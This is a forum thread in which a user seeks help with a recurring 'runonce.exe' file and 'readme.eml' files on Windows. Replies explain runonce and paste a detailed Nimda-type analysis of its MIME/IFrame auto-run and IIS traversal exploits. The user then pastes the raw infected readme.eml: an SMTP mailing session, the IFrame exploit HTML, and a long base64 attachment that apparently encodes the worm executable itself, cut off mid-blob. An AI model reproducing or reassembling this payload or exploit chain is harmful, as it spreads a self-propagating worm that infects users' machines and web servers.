runonce.exe" virus

By bi11gates
in Microsoft (Windows)

 Share

Recommended Posts

Explorer

bi11gates

Posted
Posted

I am now adays in some really damn big problem.

It all started when my younger brother(damn) copied a game he obtained from my cousin.

Ok, game went well but my computer is certainly in trouble.

The file "runonce.exe" starts with my pc.although i try to stop it with my "startup monitor", it does,nt work.

The file creates "outlook express mail message" named "readme.eml"whenever i delete "runonce.exe" from system32 folder in windows directory, it comes back.

main problem lies in the fact that i have FORMATTED C drive twice but the file still comes back and starts its activity---------->creating "readme.eml"

I DONT FIND A SOLUTION EXCEPT TO REPLACE MY HARD-DIsk.Because the file has even created readme.eml in my second 10 GB hard-disk.

SO Can u help me guys.

so if i purchase a new hard-drive, does it have a chance of going into that too ? :angry:

I have even deleted the game whose name was "midnight rider"

It has even created problem with some programs i have downloaded from internet like Quicktime,Msn Messenger.

They are not being installed

Link to comment
https://www.neowin.net/forum/topic/424972-runonceexe-virus/
Share on other sites
Grand Master

Panacik

Posted
Posted

Is this "startup monitor" program telling you all this?

Runonce is a system file and is found in the registry. Do not remove this as some files may not work correctly.

When you say you formatted, did you fdisk? Did you do an unconditional fomat or quick erase?

We might be able to help you further with this info mate.

Also post your OS and PC specs.

Cheers,

Rich

Veteran

EZRecovery

Posted
Posted

runonce - runonce.exe - Process Information

Process File: runonce or runonce.exe

Process Name: Runonce

Description:

runonce.exe is the Microsoft Run Once wrapper. It is used by the installation programs for third party applications. It allows the installation program to startup again after boot up to give the user the possibility to make further configurations. This process should not be removed ro ensure that programs are installed correctly on your system.

For More Information About runonce.exe - Get WinTasks 5 Pro Now!

Recommendation for runonce.exe:

Should not be disabled, required for essential applications to work properly.

http://www.liutilities.com/products/wintas...ibrary/runonce/

/EZ

Grand Master

Panacik

Posted
Posted

I am now running Windows 2000 after formatting previous windows xp install.

My PC is 1.5 GHZ, P4.

ok leave runonce.exe but what about "readme.eml"HOw does it come back one way r the other

:o

It may be possible that you DO have some type of virus.

Please tell me what type of format are you performing on the drive? Unconditional or Quick?

Grand Master

Panacik

Posted
Posted

W32/Nimda.A-MM

In-Depth Analysis

Visible Symptoms

Network or system slowdown

Emails arrive from infected users with an attachment most commonly named "README.EXE"

Creation of these files on the local system -

Admin.dll

Readme.eml

Load.exe

Possible firewall alerts that a file named "MEP????.TMP.EXE" is attempting to access various DNS IP addresses, where "????" could be any number or character

Infected executables have a file icon resembling an Internet Explorer document file

Threat Analysis

Viral body is 57344 bytes and is prepended to EXE files

Virus uses various exploit and infection methods in order to infect the potential

host -

Malformed MIME header and IFrame exploit within email propagation

Infectious Riched20.dll placed in DOC folder - Riched20.dll will load by default when a .DOC file is opened

INDEX.HTML / DEFAULT.HTML file load insertion - files are modified to load infectious README.EML

SYSTEM.INI file load insertion

EXE infection - virus prepends itself to target files

Network spreading - virus attempts to connect to open shares and copy itself to these locations

Infectious README.EML / DESKTOP.EML placed in all folders

IP scanning to identify IIS systems and using malformed GET request - response uploads infectious ADMIN.DLL to the target system and executes it

Hiding extensions of known file types - this aids in the launch of an executable with an inappropriate file icon

Virus arrives as an attachment from infected users in a message structured such that a malformed MIME header exploit coupled with an IFrame exploit will cause the attachment to launch automatically when the message is either opened or previewed in Outlook

The message contains two parts, one being script containing the IFrame exploit which invokes the second part, which is mislabeled on purpose with an inappropriate Content-Type of "audio/x-wav" - this is done in an effort to automatically launch the attachment commonly named "readme.exe".

When first executed, the virus will write two files into the Windows\Temp folder and execute one of them - the files may be named similar to "mepF050.TMP.exe" - the virus will also write a WININIT.INI configuration file which will delete the files written to the Temp folder at next Windows startup.

Virus will write itself as "load.exe" to the Windows\System folder, then modify the SYSTEM.INI file to run the virus secondary to loading the shell Explorer.exe with a parameter "-dontrunold"

Virus modifies the registry to hide the extensions of known file types and to not display hidden files - if infected users attempt to modify these values manually within the "View | Folder Options" menu option in a folder view, the settings are reset by the virus to continue hiding extensions and not display hidden files

Virus attempts to scan IP addresses in search of a system running IIS in an effort to infect that host - the virus uses a "Transversal Directory" exploit in order to sends a malformed "GET Admin.dll" request, which in turn triggers the target to request the infectious ADMIN.DLL from the requestor via TFTP

ADMIN.DLL will be executed on the target system and infect files matching these names -

Index.XXX

Default.XXX

Main.XXX

Where .XXX could be .asp, .htm or .html - virus drops a file "Readme.eml" on the target and modifies the qualifying files to load the .eml file using the HTML instruction "refresh"

Virus copies itself to numerous locations as the following files -

readme.nws

readme.eml

readme.doc (and infectious) riched20.dll

readme.exe

mmc.exe

Virus modifies the registry to share all local drives C through Z - after a Windows restart the drives would be fully shared - virus then attempts to copy itself to systems available across the network

Virus contains the following string -

Concept Virus(CV) V.5, Copyright©2001 R.P.China

Unconditional format should solve the poblem, whereas a quick erase may leave the virus on the mahine.

Explorer

bi11gates

Posted
  • Author
Posted

Here,s what lies in "readme.eml"

HELO btamail.net.cn

MAIL FROM: imissyou@btamail.net.cn

RCPT TO:

DATA

FROM: MIQROZOF-9J4FK3@yahoo.com

TO:

SUBJECT: MIQROZOF-9J4FK3 is comming!

MIME-Version: 1.0

Content-type: multipart/mixed; boundary="#BOUNDARY#"

--#BOUNDARY#

Content-Type: text/html

Content-Transfer-Encoding: quoted-printable

<html><HEAD></HEAD><body bgColor=3D#ffffff><iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></body></html>

--#BOUNDARY#

MIME-Version: 1.0

Content-Type: audio/x-wav; name="pp.exe"

Content-Transfer-Encoding: base64

Content-id: THE-CID

TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2luMzINCiQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAtSzvggAAAAAAAAAA4ACOgQsBAhkAAgAAAAYAAAAAAAAARAAAABAAAAAgAAAAAEAAABAAAAACAAABAAAAAAAAAAMACgAAAAAAAGAAAAAEAAAAAAAAAgAAAAAAEAAAIAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAADAAAE4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ09ERQAAAAAAEAAAABAAAAACAAAABgAAAAAAAAAAAAAAAAAAIAAAYERBVEEAAAAAABAAAAAgAAAAAgAAAAgAAAAAAAAAAAAAAAAAAEAAAMAuaWRhdGEAAAAQAAAAMAAAAAIAAAAKAAAAAAAAAAAAAAAAAABAAADALnJlbG9jAAD8HQAAAEAAAPwdAAAADAAAAAAAAAAAAAAAAAAAQAAA8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAw/8lMDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgwAAAAAAAAAAAAADgwAAAwMAAAAAAAAAAAAAAAAAAAAAAAAAAAAABGMAAAAAAAAEYwAAAAAAAAS0VSTkVMMzIuZGxsAAAAAFNsZWVwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAwAAAADMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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YW1lQQDoFAAAAFdpZGVDaGFyVG9NdWx0aUJ5dGUA6BAAAABUZXJtaW5hdGVUaHJlYWQA6A0AAABDcmVhdGVUaHJlYWQA6AgAAABfbGNyZWF0AOgUAAAAR2V0U3lzdGVtRGlyZWN0b3J5QQDoDwAAAFZpcnR1YWxBbGxvY0V4AOgUAAAAV2FpdEZvclNpbmdsZU9iamVjdADoDAAAAENsb3NlSGFuZGxlAOgTAAAAQ3JlYXRlS2VybmVsVGhyZWFkAOgTAAAAQ3JlYXRlUmVtb3RlVGhyZWFkAOgTAAAAV3JpdGVQcm9jZXNzTWVtb3J5AOgMAAAAT3BlblByb2Nlc3MA6BQAAABHZXRDdXJyZW50UHJvY2Vzc0lkAOgXAAAAUmVnaXN0ZXJTZXJ2aWNlUHJvY2VzcwDoBgAAAFNsZWVwAOgIAAAAX2xjbG9zZQDoCAAAAF9sbHNlZWsA6AgAAABfbHdyaXRlAOgHAAAAX2xyZWFkAOgHAAAAX2xvcGVuAOgMAAAAU2V0RmlsZVRpbWUA6BMAAABTZXRGaWxlQXR0cmlidXRlc0EA6AoAAABGaW5kQ2xvc2UA6A4AAABGaW5kTmV4dEZpbGVBAOgPAAAARmluZEZpcnN0RmlsZUEA6BUAAABTZXRDdXJyZW50RGlyZWN0b3J5QQDoDgAAAEdldERyaXZlVHlwZUEA6AgAAABXaW5FeGVjAOgQAAAAR2V0Q29tbWFuZExpbmVBAOgNAAAAR2V0TGFzdEVycm9yAOgNAAAAQ3JlYXRlTXV0ZXhBAOgNAAAATG9hZExpYnJhcnlBACvMwekC/+DpWIvM6AoAAAB3c3ByaW50ZkEA6A0AAABTZW5kTWVzc2FnZUEA6AoAAABHZXRXaW5kb3cA6AwAAABNZXNzYWdlQm94QQDoDAAAAEZpbmRXaW5kb3dBAOgZAAAAR2V0V2luZG93VGhyZWFkUHJvY2Vzc0lkACvMwekC/+DpWIvM6BgAAABSZWdOb3RpZnlDaGFuZ2VLZXlWYWx1ZQDoEQAAAFJlZ1F1ZXJ5VmFsdWVFeEEA6A8AAABSZWdTZXRWYWx1ZUV4QQDoDAAAAFJlZ09wZW5LZXlBACvMwekC/+DpWIvM6A4AAABXTmV0Q2xvc2VFbnVtAOgSAAAAV05ldEVudW1SZXNvdXJjZUEA6A4AAABXTmV0T3Bl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SUwgRlJPTTogaW1pc3N5b3VAYnRhbWFpbC5uZXQuY24NClJDUFQgVE86ICVzDQpEQVRBDQpGUk9NOiAlc0B5YWhvby5jb20NClRPOiAlcw0KU1VCSkVDVDogJXMgaXMgY29tbWluZyENCk1JTUUtVmVyc2lvbjogMS4wDQpDb250ZW50LXR5cGU6IG11bHRpcGFydC9taXhlZDsgYm91bmRhcnk9IiNCT1VOREFSWSMiDQoNCi0tI0JPVU5EQVJZIw0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtVHJhbnNmZXItRW5jb2Rpbmc6IHF1b3RlZC1wcmludGFibGUNCg0KPGh0bWw+PEhFQUQ+PC9IRUFEPjxib2R5IGJnQ29sb3I9M0QjZmZmZmZmPjxpZnJhbWUgc3JjPTNEY2lkOlRIRS1DSUQgaGVpZ2h0PTNEMCB3aWR0aD0zRDA+PC9pZnJhbWU+PC9ib2R5PjwvaHRtbD4NCg0KLS0jQk9VTkRBUlkjDQpNSU1FLVZlcnNpb246IDEuMA0KQ29udGVudC1UeXBlOiBhdWRpby94LXdhdjsgbmFtZT0icHAuZXhlIg0KQ29udGVudC1UcmFuc2Zlci1FbmNvZGluZzogYmFzZTY0